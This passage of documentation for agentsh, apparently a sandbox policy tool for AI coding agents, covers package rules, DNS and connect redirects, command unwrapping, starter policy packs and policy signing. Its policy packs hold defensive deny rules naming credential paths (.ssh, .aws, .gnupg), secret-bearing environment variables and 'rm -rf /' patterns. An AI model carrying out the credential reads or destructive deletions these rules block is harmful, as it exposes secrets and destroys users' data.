  BASH_ENV: "/etc/mycompany/bash_startup.sh"
  EXTRA_VAR: "policy-specific"
# ... rest of policy
```
Merge behavior

- Start with global `sandbox.env_inject`
- Layer policy `env_inject` on top
- Policy wins on key conflicts
- The result bypasses `env_policy` filtering (operator-trusted)
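The merge is a two-layer dictionary overlay. A sketch of the behavior described above (illustrative, not agentsh code):

```python
def merge_env_inject(global_inject: dict, policy_inject: dict) -> dict:
    """Start with global sandbox.env_inject, layer the policy's
    env_inject on top; the policy wins on key conflicts."""
    merged = dict(global_inject)
    merged.update(policy_inject)
    return merged

merged = merge_env_inject(
    {"BASH_ENV": "/usr/lib/agentsh/bash_startup.sh", "SHARED": "global"},
    {"BASH_ENV": "/etc/mycompany/bash_startup.sh"},
)
```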
Bundled bash startup script

agentsh includes a script at `/usr/lib/agentsh/bash_startup.sh` that disables bash builtins which could bypass seccomp policy enforcement. Note that `enable` must be disabled last — once it is gone, no further `enable -n` calls can succeed:

```shell
#!/bin/bash
# Disable builtins that bypass seccomp policy enforcement
enable -n kill     # Signal sending
enable -n ulimit   # Resource limits
enable -n umask    # File permission mask
enable -n builtin  # Force builtin bypass
enable -n command  # Function/alias bypass
enable -n enable   # Prevent re-enabling (must come last)
```

This script is included in Linux packages (deb, rpm, arch, tarballs). Set `BASH_ENV` to this path to automatically disable these builtins in bash sessions.
Package Rules

Package rules control what happens when an agent installs packages. Each rule has a `match` object and an `action`. Rules are evaluated top-to-bottom; the first match wins.

| Field | Type | Description |
|---|---|---|
| `match.packages` | string[] | Exact package names |
| `match.name_patterns` | string[] | Glob/regex patterns for package names |
| `match.finding_type` | string | Type of finding: `vulnerability`, `license`, `malware`, `typosquat`, `provenance`, `reputation` |
| `match.severity` | string | Minimum severity: `critical`, `high`, `medium`, `low`, `info` |
| `match.reasons` | string[] | Specific reason codes to match |
| `match.license_spdx.allow` | string[] | Allowlisted SPDX license identifiers |
| `match.license_spdx.deny` | string[] | Denylisted SPDX license identifiers |
| `match.ecosystem` | string | Package ecosystem: `npm`, `pypi`, `cargo`, etc. |
| `action` | string | `allow`, `warn`, `approve`, or `block` |
| `reason` | string | Human-readable reason for the rule |
```yaml
package_rules:
  # Allow a specific trusted package regardless of findings.
  # This must come FIRST: rules are first-match-wins, so placing it
  # after the blocking rules would let those rules consume the match.
  - match:
      packages: [lodash]
    action: allow

  # Block critical vulnerabilities
  - match:
      finding_type: vulnerability
      severity: critical
    action: block
    reason: "Critical vulnerability detected"

  # Block malware and typosquats
  - match:
      finding_type: malware
    action: block
  - match:
      finding_type: typosquat
    action: block

  # Block copyleft licenses
  - match:
      finding_type: license
      license_spdx:
        deny: [GPL-2.0-only, GPL-3.0-only, AGPL-3.0-only]
    action: block

  # Warn on medium vulnerabilities
  - match:
      finding_type: vulnerability
      severity: medium
    action: warn
```
DNS Redirects#
DNS redirect rules steer domain resolution at the ptrace level. When a traced process resolves a domain matching a rule, the DNS response is rewritten to the specified IP address. Available in ptrace mode only.
| Field | Type | Description |
|---|---|---|
name | string | Rule name (for logging) |
match | string | Regex pattern to match against the queried domain |
resolve_to | string | IP address to return instead of the real resolution |
visibility | string | silent, audit_only, or warn |
on_failure | string | fail_closed, fail_open, or retry_original |
dns_redirects:
  # Redirect npm registry to internal mirror
  - name: npm-mirror
    match: "^registry\\.npmjs\\.org$"
    resolve_to: "10.0.1.50"
    visibility: audit_only
    on_failure: retry_original

  # Redirect PyPI file hosts to internal mirror
  - name: pypi-mirror
    match: "^(files|upload)\\.pythonhosted\\.org$"
    resolve_to: "10.0.1.51"
    visibility: silent
    on_failure: fail_closed
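Because match is an anchored regex rather than a glob, coverage gaps are easy to introduce. A quick illustrative check of the PyPI pattern above, using plain Python re:

```python
import re

# The dns_redirects `match` field is a full regex: only the listed
# hosts match, and the anchors prevent suffix-spoofing domains.
pattern = re.compile(r"^(files|upload)\.pythonhosted\.org$")

print(bool(pattern.match("files.pythonhosted.org")))   # True
print(bool(pattern.match("pypi.org")))                 # False: needs its own rule
print(bool(pattern.match("files.pythonhosted.org.attacker.com")))  # False: $ anchor holds
```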
Connect Redirects#
Connect redirect rules steer outbound TCP connections at the ptrace level. When a traced process connects to a host:port matching a rule, the connection is redirected to the specified destination. Supports optional TLS SNI rewriting. Available in ptrace mode only.
| Field | Type | Description |
|---|---|---|
name | string | Rule name (for logging) |
match | string | Regex pattern to match against host:port |
redirect_to | string | New host:port destination |
tls.mode | string | passthrough or rewrite_sni |
tls.sni | string | New SNI value (required when mode is rewrite_sni) |
visibility | string | silent, audit_only, or warn |
on_failure | string | fail_closed, fail_open, or retry_original |
connect_redirects:
  # Route API traffic through internal proxy
  - name: api-proxy
    match: "^api\\.openai\\.com:443$"
    redirect_to: "proxy.internal:8443"
    tls:
      mode: rewrite_sni
      sni: "api.openai.com"
    visibility: audit_only
    on_failure: fail_closed
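When the upstream already presents a certificate for the original name, or the protocol is not TLS at all, passthrough mode leaves the handshake untouched. A minimal sketch (the hosts and ports here are hypothetical):

```yaml
connect_redirects:
  # Send Postgres traffic through a bastion; no TLS rewriting needed
  - name: pg-bastion
    match: "^db\\.prod\\.example\\.com:5432$"
    redirect_to: "bastion.internal:5432"
    tls:
      mode: passthrough
    visibility: warn
    on_failure: fail_open
```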
Transparent Commands Override#
Control which commands are transparently unwrapped by the execve interceptor. When a transparent command (like sudo, env, or nice) is detected, agentsh unwraps it and evaluates the payload command against policy instead. You can add custom wrappers or remove built-in ones.
transparent_commands:
  # Add custom task runners to the transparent list
  add:
    - myrunner
    - taskrunner
    - doas
  # Remove commands from the built-in defaults
  remove:
    - sudo  # Evaluate sudo itself, don't unwrap
Built-in transparent commands include: sudo, env, nice, nohup, timeout, strace, ltrace, time, xargs.
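Unwrapping can be pictured as peeling wrappers off the front of the argv until the payload remains. A simplified sketch, not agentsh's actual implementation (which also understands each wrapper's specific flag grammar):

```python
# Simplified model of transparent-command unwrapping: strip known
# wrappers plus their option/assignment arguments, then the remaining
# argv is what gets evaluated against command policy.
TRANSPARENT = {"sudo", "env", "nice", "nohup", "timeout",
               "strace", "ltrace", "time", "xargs"}

def unwrap(argv):
    while argv and argv[0] in TRANSPARENT:
        argv = argv[1:]
        # drop wrapper options (-v, --foo) and env assignments (FOO=1)
        while argv and (argv[0].startswith("-") or "=" in argv[0]):
            argv = argv[1:]
    return argv

print(unwrap(["sudo", "env", "FOO=1", "npm", "install"]))  # ['npm', 'install']
```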
Starter Policy Packs#
Pre-built policies for common scenarios:
dev-safe.yaml
Safe for local development.
- Allow workspace read/write
- Approve deletes in workspace
- Deny ~/.ssh/**, /root/.ssh/**
- Restrict network to allowlisted domains
ci-strict.yaml
Safe for CI runners.
- Deny anything outside workspace
- Deny outbound network except artifact registries
- Deny interactive shells
- Audit everything
agent-sandbox.yaml
"Agent runs unknown code" mode.
- Default deny + explicit allowlist
- Approve any credential/path access
- Redirect network tools to internal proxies
- Soft-delete destructive operations
agent-default.yaml
Comprehensive policy for AI coding agents (Claude Code, Codex CLI, etc.). Designed for use with agentsh wrap.
- Git guardrails — Redirects force push, hard reset, git clean, and direct push to main/master with helpful guidance messages
- Destructive command protection — Blocks catastrophic rm -rf / patterns
- System admin denial — Denies shutdown, reboot, systemctl, mount, dd
- Dev toolchain allowlist — Allows git, make, npm, pip, gcc, node, python, and more
- Credential protection — Denies access to .ssh/, .aws/, .kube/, .gnupg/
- Environment filtering — Blocks iteration and denies *_SECRET*, *_API_KEY*, *_TOKEN patterns
- Network — Default deny with allowlists for LLM APIs (Anthropic, OpenAI), package registries, GitHub, and localhost
- Resource limits — 8 GB memory, 500 PIDs, 15 min command timeout, 12 h session timeout
- Package rules — Blocks critical vulnerabilities and known malware
Policy Signing#
Policy files can be cryptographically signed with Ed25519 keys to prove authorship and detect tampering. When signing is enabled, agentsh verifies each policy file against a trust store of public keys before loading it.
Configuration
policies:
  signing:
    trust_store: "/etc/agentsh/keys/"  # Directory of trusted Ed25519 public key JSON files
    mode: "enforce"                    # "enforce" | "warn" | "off" (default: "off")
| Field | Type | Default | Description |
|---|---|---|---|
policies.signing.trust_store | string | — | Path to directory containing trusted public key JSON files. Each file contains an Ed25519 public key with key_id, label, and optional expires_at. |
policies.signing.mode | string | off | enforce — reject policies with invalid or missing signatures (server refuses to start). warn — log a warning, load anyway. off — skip verification. |
Signature file format
Each signed policy policy.yaml has a companion policy.yaml.sig file:
{
  "key_id": "a1b2c3d4e5f6...",      // hex(SHA256(public_key_bytes))
  "signature": "base64-encoded...", // Ed25519 detached signature
  "signer": "security-team",        // human-readable label
  "signed_at": "2026-03-18T..."     // ISO 8601 timestamp
}
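The key_id derivation is simple enough to reproduce with the standard library alone. A sketch of building the companion .sig structure (the 32 key bytes and the zeroed signature are placeholders, not real cryptographic material):

```python
import base64
import hashlib
import json

# key_id is hex(SHA256(public_key_bytes)), per the format above.
# Real Ed25519 signing requires a crypto library and a private key;
# here both key and signature are dummy placeholders.
public_key_bytes = bytes(range(32))               # placeholder 32-byte key
key_id = hashlib.sha256(public_key_bytes).hexdigest()

sig = {
    "key_id": key_id,                             # 64 hex characters
    "signature": base64.b64encode(b"\x00" * 64).decode(),  # placeholder
    "signer": "security-team",
    "signed_at": "2026-03-18T00:00:00Z",
}
print(len(sig["key_id"]))  # 64
```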
Verification in all loading paths
Signature verification runs in all four policy loading paths:
- Server startup (policy manager initialization)
- Session creation (session-specific policies)
- FUSE mount policy reload
- Default policy loader
Every verification — success or failure — generates an audit event with key_id, signer, signed_at, and the verification result. Failure reasons include invalid_signature, unknown_key, missing_signature, and expired_key.
See Features → Policy Signing for the CLI workflow (keygen, sign, verify) and Setup → Policy Signing for configuration guidance.